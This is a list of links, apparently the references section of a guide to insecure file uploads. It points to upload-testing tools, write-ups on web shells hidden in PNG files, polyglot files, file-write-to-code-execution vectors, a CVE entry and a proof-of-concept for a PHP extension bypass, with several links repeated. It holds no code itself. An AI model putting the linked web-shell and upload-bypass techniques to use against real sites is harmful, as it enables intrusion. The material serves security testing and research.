- [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
- [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
- [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
- [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
- [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
- https://github.com/modzero/mod0BurpUploadScanner
- https://github.com/almandin/fuxploider
- https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
- https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
- https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
- https://blog.doyensec.com/2025/01/09/cspt-file-upload.html
- [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)